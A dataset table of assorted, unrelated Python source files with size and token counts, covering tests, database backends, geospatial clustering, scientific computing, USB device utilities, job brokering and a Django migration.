text string | size int64 | token_count int64 |
|---|---|---|
import pytest
from pystac_client import CollectionClient
from pystac_client.client import Client
from .helpers import STAC_URLS
class TestCollectionClient:
@pytest.mark.vcr
def test_instance(self):
client = Client.open(STAC_URLS['PLANETARY-COMPUTER'])
collection = client.get_collection('aster-l1t')
assert isinstance(collection, CollectionClient)
assert str(collection) == '<CollectionClient id=aster-l1t>'
@pytest.mark.vcr
def test_get_items(self):
client = Client.open(STAC_URLS['PLANETARY-COMPUTER'])
collection = client.get_collection('aster-l1t')
for item in collection.get_items():
assert (item.collection_id == collection.id)
return
| 743 | 225 |
from __future__ import absolute_import
from frasco import copy_extra_feature_options, current_app
from frasco.utils import JSONEncoder, ContextStack, DelayedCallsContext
from frasco_models import Backend, ModelSchemaError, and_, split_field_operator, QueryError
from frasco_models.utils import clean_proxy
from flask_sqlalchemy import SQLAlchemy, Model as BaseModel
from sqlalchemy.ext.declarative import declarative_base
import sqlalchemy
from sqlalchemy.inspection import inspect as sqlainspect
from sqlalchemy.sql import sqltypes
import inspect
import datetime
from contextlib import contextmanager
import functools
class Model(BaseModel):
def __taskdump__(self):
return 'frasco::current_app.features.models[%s]' % self.__class__.__name__, str(self.id)
@classmethod
def __taskload__(cls, id):
return cls.query.get(id)
sqla_type_mapping = [
(sqltypes.Integer, int),
(sqltypes.Float, float),
(sqltypes.Boolean, bool),
(sqltypes.DateTime, datetime.datetime),
(sqltypes.Date, datetime.date)
]
class SqlalchemyBackend(Backend):
name = "sqlalchemy"
def __init__(self, app, options):
super(SqlalchemyBackend, self).__init__(app, options)
copy_extra_feature_options(app.features.models, app.config, 'SQLALCHEMY_')
self.db = SQLAlchemy(app, session_options=options.get('session_options'),
model_class=Model)
@app.cli.command()
def create_db():
try:
self.db.create_all()
except sqlalchemy.exc.CircularDependencyError as e:
try:
self.graph_circular_dependency_error(e)
except ImportError:
app.logger.info('Install networkx and pygraphviz to generate a graph of the circular dependency')
pass
raise
app.cli.command('drop_db')(self.db.drop_all)
if app.features.exists('tasks'):
from celery.signals import task_postrun
def handle_celery_postrun(retval=None, *args, **kwargs):
if app.config.get('SQLALCHEMY_COMMIT_ON_TEARDOWN'):
if not isinstance(retval, Exception):
self.db.session.commit()
if not app.config.get('CELERY_ALWAYS_EAGER'):
self.db.session.remove()
task_postrun.connect(handle_celery_postrun, weak=False)
def ensure_model(self, name):
if isinstance(name, self.db.Model):
return name
return self.db.Model._decl_class_registry[name]
def ensure_schema(self, name, fields):
model = self.ensure_model(name)
for fname, _ in fields.iteritems():
if fname not in model.__mapper__.attrs:
raise ModelSchemaError("Missing field '%s' in model '%s'" % (fname, name))
def inspect_fields(self, model):
if not inspect.isclass(model):
model = model.__class__
mapper = sqlainspect(model)
fields = []
for attr in mapper.column_attrs:
field_type = str
for coltype, pytype in sqla_type_mapping:
if isinstance(attr.columns[0].type, coltype):
field_type = pytype
break
fields.append((attr.key, dict(type=field_type)))
return fields
def begin_transaction(self):
self.db.session.begin(subtransactions=True)
def flusb_transaction(self):
self.db.session.fush()
def commit_transaction(self):
self.db.session.commit()
def rollback_transaction(self):
self.db.session.rollback()
def add(self, obj):
self.db.session.add(obj)
def remove(self, obj):
self.db.session.delete(obj)
def find_by_id(self, model, id):
return model.query.filter_by(id=id).first()
def find_all(self, query):
return self._transform_query(query).all()
def find_first(self, query):
return self._transform_query(query).first()
def find_one(self, query):
return self._transform_query(query).first()
def count(self, query):
return self._transform_query(query).count()
def update(self, query, data):
return self._transform_query(query).update(
self._prepare_data(query.model, data),
synchronize_session=False)
def delete(self, query):
return self._transform_query(query).delete(
synchronize_session=False)
def _transform_query(self, q):
qs = q.model.query
if q._filters:
qs = qs.filter(self._transform_query_filter_group(q.model, and_(*q._filters)))
if q._order_by:
qs = qs.order_by(*[k + ' ' + v for k, v in q._order_by])
if q._offset:
qs = qs.offset(q._offset)
if q._limit:
qs = qs.limit(q._limit)
return qs
def _transform_query_filter_group(self, model, group):
operator, filters = group.items()[0]
transformed_filters = []
for filter in filters:
if isinstance(filter, dict):
q = self._transform_query_filter_group(model, filter)
if q is None:
continue
else:
q = self._transform_query_filter(model, filter)
transformed_filters.append(q)
if operator == "$or":
return sqlalchemy.or_(*transformed_filters)
return sqlalchemy.and_(*transformed_filters)
def _transform_query_filter(self, model, filter):
field, value = filter
field, operator, py_operator = split_field_operator(field, with_python_operator=True)
value = clean_proxy(value)
column = getattr(model, field)
if py_operator:
return py_operator(column, value)
if operator == 'in':
return column.in_(value)
if operator == 'nin':
return ~column.in_(value)
raise QueryError("Cannot convert operator '%s' to sqlalchemy operator" % operator)
def _prepare_data(self, model, data):
out = {}
for field, value in data.iteritems():
field, operator = split_field_operator(field)
column = getattr(model, field)
if operator == 'incr':
out[column] = column + value
elif operator == 'push':
raise QueryError("Operator 'push' not supported by sqlalchemy")
else:
out[column] = value
return out
def graph_circular_dependency_error(self, e, filename='sqla_circular_dep_graph.png'):
# from: http://ilyasterin.com/blog/2014/01/cyclical-dependency-detection-in-the-database.html
import networkx as nx
G=nx.DiGraph()
cycle_tables = set([t.name for t in e.cycles])
for t in e.cycles:
for fk in t.foreign_keys:
table, col = fk.target_fullname.split('.')
if (table in cycle_tables):
G.add_edge(t.name, table)
agraph = nx.to_agraph(G)
agraph.draw(filename, format='png', prog='dot')
| 7,135 | 2,102 |
from pessoa import Pessoa
p1 = Pessoa('Luiz', 29)
p2 = Pessoa('Joana', 59)
# Teste para já está comendo
# p1.comer('maçã')
# p1.comer('maçã')
# Teste para não está comendo
# p1.para_comer()
# Teste para já está falando
# p1.falar('Política')
# p1.falar('Política')
# Teste para não falar comendo
# p1.comer('maçã')
# p1.falar('Política')
# Teste para não está falando
# p1.parar_falar()
# Teste para não pode comer falando
# p1.falar('Estudo')
# p1.comer('Maçã')
p1.comer('ovo')
p1.para_comer()
p1.falar('COmida')
p1.parar_falar() | 538 | 257 |
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- SIGB - Introduction to Graphics and Image Analysis -->
#<!-- File : Enumerations.py -->
#<!-- Description: Class used for managing the cameras enumerations -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: No additional information -->
#<!-- Date : 24/02/2016 -->
#<!-- Change : 24/02/2016 - Creation of this class -->
#<!-- Review : 24/02/2016 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = "$Revision: 2016022401 $"
########################################################################
"""Enumerations used for selecting the input cameras used by SIGB Framework."""
CAMERA_VIDEOCAPTURE_320X240 = "CAMERA_VIDEOCAPTURE_320X240"
CAMERA_VIDEOCAPTURE_320X240_15FPS = "CAMERA_VIDEOCAPTURE_320X240_15FPS"
CAMERA_VIDEOCAPTURE_320X240_30FPS = "CAMERA_VIDEOCAPTURE_320X240_30FPS"
CAMERA_VIDEOCAPTURE_640X480 = "CAMERA_VIDEOCAPTURE_640X480"
CAMERA_VIDEOCAPTURE_640X480_15FPS = "CAMERA_VIDEOCAPTURE_640X480_15FPS"
CAMERA_VIDEOCAPTURE_640X480_30FPS = "CAMERA_VIDEOCAPTURE_640X480_30FPS"
| 2,135 | 695 |
import json
import nlpaug.augmenter.char as nac
import pandas as pd
from transformers import AutoModelForSequenceClassification, AutoTokenizer, pipeline
from transformers.tokenization_utils import PreTrainedTokenizer
from config import Config
transformer_model = "distilbert-base-uncased-finetuned-sst-2-english"
# load model
tokenizer = AutoTokenizer.from_pretrained(transformer_model)
inference_model = AutoModelForSequenceClassification.from_pretrained(transformer_model)
model = pipeline("sentiment-analysis", model=inference_model, tokenizer=tokenizer)
# define text perturbation
keyboard_aug = nac.KeyboardAug(aug_word_max=1)
def typo(aug, input):
output = aug.augment(input)
return output
def eval_perturb(input_a, input_b):
output_a, output_b = model([input_a, input_b])
sq_error = (output_a["score"] - output_b["score"]) ** 2
acc = output_a["label"] == output_b["label"]
# print(input_a, input_b)
# print(output_a["label"], output_b["label"])
# print("---")
return sq_error, acc, output_b["score"]
# read in our test dataset
f = open(Config.TEST_SET)
test_dataset = f.read().split("\t")[:-1]
# Loop over all test examples and evaluate
mse, total_acc = 0, 0
n = len(test_dataset)
interesting_cases = []
for sentence in test_dataset:
sentence_mod = typo(keyboard_aug, sentence)
sq_error, acc, perturb_score = eval_perturb(sentence, sentence_mod)
mse += (1 / n) * sq_error
total_acc += (1 / n) * acc
if acc == False:
interesting_cases.append((sentence, sentence_mod, perturb_score))
interesting_cases.sort(key=lambda tup: tup[2], reverse=True)
# Write out our favorite interesting cases
to_report = interesting_cases[:5]
df = pd.DataFrame(to_report, columns=["Original", "Perturbed", "Model confidence"])
with open(Config.TOP_PERTURBATIONS, "w") as outfile:
outfile.write(df.to_markdown(index=False))
# Write results to file
with open(Config.TEST_SCORES, "w") as outfile:
json.dump({"accuracy": total_acc, "mse": mse}, outfile)
| 2,022 | 684 |
from functools import reduce
import numpy as np
import matplotlib.pyplot as plt
from dateutil import parser
import glob
import os
import csv
import json
def loadData(path, subset = -1, loadDebug = False):
allFiles = glob.glob(os.path.join(path, "data_*.csv"))
if(subset > 0):
allFiles = allFiles[0:subset]
data = []
debug = []
for file in allFiles:
print(file)
fileNum = file.split('/')[-1].replace("data_","").replace(".csv","")
with open(file, 'r') as f:
data.append([float(val) for sublist in list(csv.reader(f)) for val in sublist])
if loadDebug:
with open(file.replace("data_"+fileNum+".csv","debug_"+fileNum+".csv")) as f:
debug.append(json.load(f))
return (np.array(data), debug)
def calculateEma(price, interval = 9, startEma = -1):
#https://www.investopedia.com/ask/answers/122314/what-exponential-moving-average-ema-formula-and-how-ema-calculated.asp
# (Closing price-EMA(previous day)) x multiplier + EMA(previous day)
k = 2/(interval + 1)
if startEma > 0:
return reduce(lambda x,y: x + [ (y - x[-1]) * k + x[-1] ], price, [startEma])
else:
subset = price[0:interval]
sma = sum(subset) / len(subset)
start = [sma] * interval
return reduce(lambda x,y: x + [ (y - x[-1]) * k + x[-1] ], price[interval:], start)
def rewindEma(price, interval, startEma):
k = 2/(interval + 1)
return reduce(lambda x,c: x + [ (-c*k + x[-1]) / (-k+1) ], price, [startEma])
def priceChangeToPrice(data, initial = 100):
return list(reduce(lambda x,y: x + [ x[-1]+(x[-1]*y) ], data, list([initial]) ) )
def rewindPriceChangeToPrice(data, initial = 100):
return list(reduce(lambda x,y: x + [ x[-1] / (y+1.0) ], data, list([initial]) ) )
def debugPlot(data, debug, timeDomains = [1,5,15,30]):
sample1Min = data[0:181]
sample1Min = sample1Min[1::2] # only want price
trigger = debug["Trigger"]["parent"][0]
trainingExampleId = debug["TrainingExample"]["id"]
symbol = debug["TrainingExample"]["symbol"]["sym"]
triggerData = [val for sublist in trigger["event"]["data"] for val in sublist]
priceData = list(filter(lambda x: x["$type"] == "m.q.PriceTs", triggerData ))
ema15Data = list(filter(lambda x: x["$type"] == "m.q.EmaTs" and x["data"]["timePeriod"] == 15, triggerData ))
ema65Data = list(filter(lambda x: x["$type"] == "m.q.EmaTs" and x["data"]["timePeriod"] == 65, triggerData ))
# we need to rewind these values through time now.
rewindPrice1 = rewindPriceChangeToPrice(sample1Min[::-1], initial=priceData[0]["data"]["close"])
#print("15: "+str(ema15Data[0]["data"]["ema"]))
#print("65: "+str(ema65Data[0]["data"]["ema"]))
rewindEma15 = rewindEma(rewindPrice1, 15, startEma = ema15Data[0]["data"]["ema"])
rewindEma65 = rewindEma(rewindPrice1, 65, startEma = ema65Data[0]["data"]["ema"])
#print("rewindPrice1: " + str(rewindPrice1[-1]))
#print("rewindEma15: " + str(rewindEma15[-1]))
#print("rewindEma65: " + str(rewindEma65[-1]))
enterPrice = priceData[0]["data"]["close"]
print("symbol: "+symbol)
print("Training Example: " + trainingExampleId)
print("enter price: " + str(enterPrice))
print("enter time: " + priceData[0]["time"])
time = parser.parse(priceData[0]["time"])
print(time.minute)
graph1 = priceChangeToPrice(sample1Min, initial=rewindPrice1[-1])
ema15 = calculateEma(graph1, 15, startEma=graph1[0])
ema65 = calculateEma(graph1, 65, startEma=graph1[0])
series = [graph1, ema65, ema15]
ind = 1
for t in filter(lambda x: x != 1,timeDomains):
start = (ind*180)+1
end = ((ind+1)*180)+1
sampleXMin = data[start:end]
sampleXMin = sampleXMin[::2]
remainder = (60+time.minute) % t
#print("x: "+str(60+time.minute))
#print("remainder: " + str(remainder) )
#print(graph1[-(remainder+1)])
rewindPriceX = rewindPriceChangeToPrice(sampleXMin[::-1], initial=graph1[-(remainder+1)])
extra = 90*t - 90*timeDomains[ind-1]
series = [([None] * extra) + x for x in series]
graphX = priceChangeToPrice(sampleXMin, initial=rewindPriceX[-1])
graphX = [[x]*t for x in graphX]
graphX = [val for sublist in graphX for val in sublist][remainder:]
series.append(graphX)
ind = ind+1
for x in series:
plt.plot(x)
plt.show()
| 4,534 | 1,700 |
# -*- coding: utf-8 -*-
# @Date : 2017-07-18 20:12:08
# @Author :
| 71 | 47 |
# --------------------------------
# Name: GeoDBSCAN.py
# Purpose: This script is intended to allow ArcGIS users that have Scikit Learn installed in their python installation
# utilize DBSCAN to create clusters of geographic features based on their centroids.
# Current Owner: David Wasserman
# Last Modified: 4/5/2020
# Copyright: (c) David Wasserman
# ArcGIS Version: ArcGIS Pro
# Python Version: 3.6
# --------------------------------
# Copyright 2016 David J. Wasserman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# --------------------------------
# Import Modules
import os, arcpy
import numpy as np
import pandas as pd
import glearnlib as gl
try:
from sklearn import cluster
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
except:
arcpy.AddError("This library requires Sci-kit Learn installed in the ArcGIS Python Install."
" Might require installing pre-requisite libraries and software.")
# Function Definitions
def classify_features_dbscan(in_fc, neighborhood_size, minimum_samples, weight_field):
"""Take in a feature class of points and classify them into clusters using DBSCAN from Scikit learn.
Append field labels to the input feature class using Extend Numpy Array function."""
try:
# Declare Starting Variables
desc = arcpy.Describe(in_fc)
OIDFieldName = desc.OIDFieldName
workspace = os.path.dirname(desc.catalogPath)
gl.arc_print("Converting '{0}' feature class geometry to X-Y centroid numpy arrays.".format(str(desc.name)))
centroid_x, centroid_y = 'SHAPE@X', 'SHAPE@Y'
objectid = 'OID@'
fields = [centroid_x, centroid_y, objectid]
use_weight = False
if gl.field_exist(in_fc, weight_field):
fields.append(weight_field)
use_weight = True
# Convert Feature Class to NP array
geoarray = arcpy.da.FeatureClassToNumPyArray(in_fc, fields,
null_value=1) # Null Values of treated as one feature -weight
cluster_fields = [centroid_x, centroid_y]
data = pd.DataFrame(geoarray)
coordinates_cluster = data[cluster_fields]
if use_weight:
gl.arc_print("Using weight field {0} and geographic coordinates for clustering with DBSCAN.".format(
str(weight_field)), True)
weight = np.asarray(data[weight_field], dtype=np.float64)
dbscan_classification = cluster.DBSCAN(neighborhood_size, minimum_samples).fit(coordinates_cluster, weight)
else:
gl.arc_print("Using geographic coordinates to classify with DBSCAN.", True)
dbscan_classification = cluster.DBSCAN(neighborhood_size, minimum_samples).fit(coordinates_cluster)
core_samples_mask = np.zeros_like(dbscan_classification.labels_, dtype=bool)
core_samples_mask[dbscan_classification.core_sample_indices_] = True
labels = dbscan_classification.labels_
# Number of clusters in labels, ignoring noise if present.
cluster_count = len(set([i for i in labels if i != -1]))
gl.arc_print('Estimated number of clusters: {0}'.format(cluster_count), True)
try:
gl.arc_print("Silhouette Coefficient: {0}.".format(metrics.silhouette_score(coordinates_cluster, labels)),
True)
gl.arc_print(
"""Wikipedia: The silhouette value is a measure of how similar an object is to its own cluster (cohesion) compared to other clusters (separation). The silhouette ranges from -1 to 1, where a high value indicate that the object is well matched to its own cluster and poorly matched to neighboring clusters.""")
except Exception as e:
gl.arc_print("Could not compute Silhouette Coefficient. Error: {0}".format(str(e.args[0])), True)
gl.arc_print("Appending Labels from DBSCAN to new numpy array.", True)
JoinField = str(arcpy.ValidateFieldName("NPIndexJoin", workspace))
LabelField = str(arcpy.ValidateFieldName("DBSCANLabel", workspace))
finalDBSCANArray = np.array(list(zip(data[objectid], labels)),
dtype=[(JoinField, np.int32), (LabelField, np.int32)])
gl.arc_print("Extending Label Fields to Output Feature Class. Clusters labels start at 0, noise is labeled -1.",
True)
arcpy.da.ExtendTable(in_fc, OIDFieldName, finalDBSCANArray, JoinField, append_only=False)
del geoarray, finalDBSCANArray, labels, dbscan_classification, core_samples_mask
gl.arc_print("Script Completed Successfully.", True)
except arcpy.ExecuteError:
gl.arc_print(arcpy.GetMessages(2))
except Exception as e:
print(str(e.args[0]))
arcpy.AddError(str(e.args[0]))
# End do_analysis function
# This test allows the script to be used from the operating
# system command prompt (stand-alone), in a Python IDE,
# as a geoprocessing script tool, or as a module imported in
# another script
if __name__ == '__main__':
# Define input parameters
input_feature_class = arcpy.GetParameterAsText(0)
neighborhood_size = arcpy.GetParameter(1)
minimum_samples = arcpy.GetParameter(2)
weight_field = arcpy.GetParameterAsText(3)
classify_features_dbscan(input_feature_class, neighborhood_size, minimum_samples, weight_field)
| 5,913 | 1,692 |
#this implementation mainly work on grey scale image
import argparse
import shutil
from pathlib import Path
import natsort
from qatm_pytorch_v3 import CreateModel, ImageDataset,ImageDataset_2, plot_result_mayank, nms, run_one_sample_mayank
from torchvision import models
import torch
from utils import *
from imageloader_mayank import TripletImageLoader,TinyImageNetLoader,find_correct_template_output
# +
# import functions and classes from qatm_pytorch.py
print("import qatm_pytorch.py...")
import time
from data_preprocess_for_inference import find_template
if __name__ == '__main__':
batch_size_train=7
batch_size_test=7
#deep ranking starts here
root=''
# trainloader, testloader = TinyImageNetLoader(args.dataroot, args.batch_size_train, args.batch_size_test)
trainset = TripletImageLoader(base_path=root)
trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size_train, num_workers=4)
image_list_sample=trainset.image_name_sample
testset = TripletImageLoader(base_path=root, train=False)
testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size_test, num_workers=4)
image_index=find_correct_template_output(trainloader, testloader, "is_gpu")
final_image=image_list_sample[image_index]
print (image_list_sample)
save_frame_path = "../data/image_save/" + final_image
max_score_img=cv2.imread(save_frame_path)
cv2.imshow('final selection', max_score_img)
ch = cv2.waitKey(2000)
if ch & 0XFF == ord('q'):
cv2.destroyAllWindows()
# cv2.waitKey(1)
cv2.destroyAllWindows()
| 1,607 | 555 |
from pydmfet import proj_ao, tools
from pydmfet.qcwrap.pyscf_rks_ao import rks_ao
from pyscf import gto,scf
import numpy as np
from pyscf.tools import molden
t0 = tools.time0()
bas ='6-31G*'
temp = 0.005
mol = gto.Mole()
mol.atom = open('O2-C24.xyz').read()
mol.basis = bas
mol.charge = 0
mol.build(max_memory = 24000, verbose=4)
dm_guess=None
_, _, mo_coeff, mo_occ, _, _ = molden.load("MO_pbe.molden")
dm_guess = np.dot(mo_coeff*mo_occ, mo_coeff.T)
#mf = scf.UKS(mol)
mf = rks_ao(mol,smear_sigma = temp)
mf.xc = "pbe,pbe"
mf.max_cycle = 50
mf.scf(dm0=dm_guess)
'''
with open( 'MO.molden', 'w' ) as thefile:
molden.header(mf.mol, thefile)
molden.orbital_coeff(mf.mol, thefile, mf.mo_coeff,occ = mf.mo_occ, ene = mf.mo_energy)
'''
natoms = mol.natm
impAtom = np.zeros([natoms], dtype=int)
for i in range(8):
impAtom[i] = 1
embed = proj_ao.proj_embed(mf,impAtom, Ne_env = 110)
embed.pop_method = 'meta_lowdin'
embed.pm_exponent = 2
embed.make_frozen_orbs(norb = 83)
embed.embedding_potential()
| 1,017 | 520 |
"""
Interface to the account_users table. Data format is dicts, not objects.
"""
from passlib import pwd
from passlib.context import CryptContext
from anchore_engine.db import AccountUser, AccessCredential, UserAccessCredentialTypes
from anchore_engine.db.entities.common import anchore_now
from anchore_engine.configuration import localconfig
from anchore_engine.subsys import logger
class UserNotFoundError(Exception):
def __init__(self, username):
super(UserNotFoundError, self).__init__('User not found. Username={}'.format(username))
self.username = username
class UserAlreadyExistsError(Exception):
def __init__(self, account_name, username):
super(UserAlreadyExistsError, self).__init__('User already exists. account={} username={}'.format(account_name, username))
self.account_name = account_name
self.username = username
class CredentialAlreadyExistsError(Exception):
def __init__(self, account_name, username, cred_type):
super(CredentialAlreadyExistsError, self).__init__(
'User already exists. account={} username={} cred_typ={}'.format(account_name, username, cred_type))
self.account_name = account_name
self.username = username
self.credential_type = cred_type
def _generate_password():
"""
Returns a randomly generated string of up to 32 characters
:return: str
"""
return pwd.genword(entropy=48)
_hasher = None
class PasswordHasher(object):
def __init__(self, config):
self.do_hash = config.get('user_authentication', {}).get('hashed_passwords', False)
def hash(self, password):
"""
Hash the password to store it. If not configured for hashes, this is a no-op.
:param password:
:return:
"""
logger.info('Checking hash on password')
if self.do_hash:
logger.info('Hashing password prior to storage')
context = dict(schemes=['argon2'])
cc = CryptContext(**context)
password = cc.hash(password)
else:
logger.info('No hash requirement set in config')
return password
def get_hasher(config=None):
global _hasher
if _hasher is None:
conf = config if config is not None else localconfig.get_config()
_hasher = PasswordHasher(conf)
return _hasher
def add(account_name, username, user_type, user_source, session):
"""
Create a new user, raising error on conflict
:param accountId: str
:param username: str
:param password: str
:param access_type: type of access for this credential
:param session:
:return:
"""
user_to_create = session.query(AccountUser).filter_by(username=username).one_or_none()
if user_to_create is None:
user_to_create = AccountUser()
user_to_create.account_name = account_name
user_to_create.username = username
user_to_create.created_at = anchore_now()
user_to_create.type = user_type
user_to_create.source = user_source
user_to_create.last_updated = anchore_now()
session.add(user_to_create)
session.flush()
else:
raise UserAlreadyExistsError(account_name, username)
return user_to_create.to_dict()
def add_user_credential(username, credential_type=UserAccessCredentialTypes.password, value=None, overrwrite=True, session=None):
usr = session.query(AccountUser).filter_by(username=username).one_or_none()
if not usr:
raise UserNotFoundError(username)
matching = [obj for obj in filter(lambda x: x.type == credential_type, usr.credentials)]
if overrwrite:
for existing in matching:
session.delete(existing)
else:
if matching:
raise CredentialAlreadyExistsError(usr['account_name'], username, credential_type)
credential = AccessCredential()
credential.user = usr
credential.username = usr.username
credential.type = credential_type
credential.created_at = anchore_now()
if value is None:
value = _generate_password()
credential.value = get_hasher().hash(value) # This is a no-op if hashing is not configured
session.add(credential)
return credential.to_dict()
def delete_user_credential(username, credential_type, session):
cred = session.query(AccessCredential).filter_by(username=username, type=credential_type).one_or_none()
if cred:
session.delete(cred)
return True
def get_all(session):
return [x.to_dict() for x in session.query(AccountUser)]
def get(username, session=None):
usr = session.query(AccountUser).filter_by(username=username).one_or_none()
if usr:
return usr.to_dict()
else:
return None
def get_by_uuid(uuid, session=None):
usr = session.query(AccountUser).filter_by(uuid=uuid).one_or_none()
if usr:
return usr.to_dict()
else:
return None
def list_for_account(accountname, session=None):
users = session.query(AccountUser).filter_by(account_name=accountname)
if users:
return [u.to_dict() for u in users]
else:
return []
def delete(username, session=None):
result = session.query(AccountUser).filter_by(username=username).one_or_none()
if result:
session.delete(result)
return True
else:
return False
| 5,376 | 1,584 |
#
# Copyright (c) 2019, Manfred Constapel
# This file is licensed under the terms of the MIT license.
#
import sys, time
from lib.utility import *
# ------------------------------------------------
VID, PID = 0x0451, 0xbef3 # XDS110
# ------------------------------------------------
try:
import usb
except Exception as e:
print('exception : lib :', e, file=sys.stderr, flush=True)
# ------------------------------------------------
def usb_init(desc_print=True, nodev_exit=True):
if 'usb' not in sys.modules: return None
try:
dev = usb.core.find(idVendor=VID, idProduct=PID)
if dev is not None:
dev._detached_ = []
m = usb.util.get_string(dev, dev.iManufacturer)
p = usb.util.get_string(dev, dev.iProduct)
s = usb.util.get_string(dev, dev.iSerialNumber)
dev._serno_ = s
if desc_print:
print('{} : {} : {}'.format(m, p, s), file=sys.stderr, flush=True)
return dev
elif nodev_exit:
print('exception : main :', 'no device has been detected', file=sys.stderr)
sys.exit(1)
except Exception as e:
print(e)
return None
def usb_point(dev, num, out):
if 'usb' not in sys.modules: return None
ept = (usb.util.ENDPOINT_IN, usb.util.ENDPOINT_OUT)
cfg = dev.get_active_configuration()
intf = cfg[(num, 0)]
ep = usb.util.find_descriptor(intf,
custom_match=lambda e: usb.util.endpoint_direction(
e.bEndpointAddress) == ept[int(out % 2)])
return ep
def usb_free(dev):
if 'usb' not in sys.modules: return None
usb.util.dispose_resources(dev)
for ifn in dev._detached_:
usb.util.release_interface(dev, ifn)
try: dev.attach_kernel_driver(ifn)
except: pass
# ------------------------------------------------
def xds_reset(dev, delay=50):
#_ = {0:'CDC Communication',
# 1:'CDC Data', 2:'Vendor Specific', 3:'CDC Communication',
# 4:'CDC Data', 5:'Human Interface Device', 6:'Vendor Specific'}
ep = usb_point(dev, 2, True)
if ep is None: return False
for v in ('00', '01'):
ep.write(hex2dec('{} {} {} {}'.format('2a', '02', '00', '0e {}'.format(v))))
time.sleep(delay / 1000)
return True
| 2,314 | 803 |
from pandajedi.jedicore import Interaction
# base class for job brokerage
class JobBrokerBase (object):
def __init__(self,ddmIF,taskBufferIF):
self.ddmIF = ddmIF
self.taskBufferIF = taskBufferIF
self.liveCounter = None
self.lockID = None
self.baseLockID = None
self.useLock = False
self.testMode = False
self.refresh()
self.task_common = None
# set task common dictionary
def set_task_common_dict(self, task_common):
self.task_common = task_common
# get task common attribute
def get_task_common(self, attr_name):
if self.task_common:
return self.task_common.get(attr_name)
# set task common attribute
def set_task_common(self, attr_name, attr_value):
self.task_common[attr_name] = attr_value
def refresh(self):
self.siteMapper = self.taskBufferIF.getSiteMapper()
def setLiveCounter(self,liveCounter):
self.liveCounter = liveCounter
def getLiveCount(self,siteName):
if self.liveCounter is None:
return 0
return self.liveCounter.get(siteName)
def setLockID(self,pid,tid):
self.baseLockID = '{0}-jbr'.format(pid)
self.lockID = '{0}-{1}'.format(self.baseLockID,tid)
def getBaseLockID(self):
if self.useLock:
return self.baseLockID
return None
def releaseSiteLock(self, vo, prodSourceLabel, queue_id):
# FIXME: releaseSiteLock method is unused elswhere
if self.useLock:
self.taskBufferIF.unlockProcessWithPID_JEDI(vo, prodSourceLabel, queue_id, self.lockID, False)
def lockSite(self, vo, prodSourceLabel, siteName, queue_id):
if not self.useLock:
self.useLock = True
# FIXME: lockSite method is unused elswhere; lockProcess_JEDI arguments have changed and incompatible with the following line
# self.taskBufferIF.lockProcess_JEDI(vo, prodSourceLabel, siteName, queue_id, self.lockID, True)
def checkSiteLock(self, vo, prodSourceLabel, siteName, queue_id, resource_name):
return self.taskBufferIF.checkProcessLock_JEDI( vo=vo, prodSourceLabel=prodSourceLabel,
cloud=siteName, workqueue_id=queue_id,
resource_name=resource_name,
component=None, pid=self.baseLockID, checkBase=True)
def setTestMode(self):
self.testMode = True
# get list of unified sites
def get_unified_sites(self, scan_site_list):
unified_list = set()
for tmpSiteName in scan_site_list:
tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
unifiedName = tmpSiteSpec.get_unified_name()
unified_list.add(unifiedName)
return tuple(unified_list)
# get list of pseudo sites
def get_pseudo_sites(self, unified_list, scan_site_list):
unified_list = set(unified_list)
pseudo_list = set()
for tmpSiteName in scan_site_list:
tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
if tmpSiteSpec.get_unified_name() in unified_list:
pseudo_list.add(tmpSiteName)
return tuple(pseudo_list)
# add pseudo sites to skip
def add_pseudo_sites_to_skip(self, unified_dict, scan_site_list, skipped_dict):
for tmpSiteName in scan_site_list:
tmpSiteSpec = self.siteMapper.getSite(tmpSiteName)
if tmpSiteSpec.get_unified_name() in unified_dict:
skipped_dict[tmpSiteName] = unified_dict[tmpSiteSpec.get_unified_name()]
return skipped_dict
Interaction.installSC(JobBrokerBase)
| 3,760 | 1,136 |
from .base import AbstractNegativeSampler
from tqdm import trange
from tqdm import tqdm
from collections import Counter
import numpy as np
class PopularNegativeSampler(AbstractNegativeSampler):
@classmethod
def code(cls):
return 'popular'
def generate_negative_samples(self):
popularity = self.items_by_popularity()
keys = list(popularity.keys())
values = [popularity[k] for k in keys]
sum_value = np.sum(values)
p = [value / sum_value for value in values]
negative_samples = {}
print('Sampling negative items')
for user in tqdm(self.test):
seen = set(self.train[user])
seen.update(self.val[user])
seen.update(self.test[user])
samples = []
while len(samples) < self.sample_size:
sampled_ids = np.random.choice(keys, self.sample_size, replace=False, p=p).tolist()
sampled_ids = [x for x in sampled_ids if x not in seen and x not in samples]
samples.extend(sampled_ids)
samples = samples[:self.sample_size]
negative_samples[user] = samples
return negative_samples
def items_by_popularity(self):
popularity = Counter()
for user in tqdm(self.test):
popularity.update(self.train[user])
popularity.update(self.val[user])
popularity.update(self.test[user])
return popularity
| 1,467 | 427 |
# Generated by Django 2.0.6 on 2018-07-30 00:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Ebooks', '0008_pdfinfo_pdfdescription'),
]
operations = [
migrations.AddField(
model_name='pdfinfo',
name='PdfEmail',
field=models.CharField(default=1, max_length=10000),
preserve_default=False,
),
migrations.AddField(
model_name='pdfinfo',
name='PdfPhoneNumber',
field=models.CharField(default=5, max_length=10000),
preserve_default=False,
),
]
| 650 | 208 |
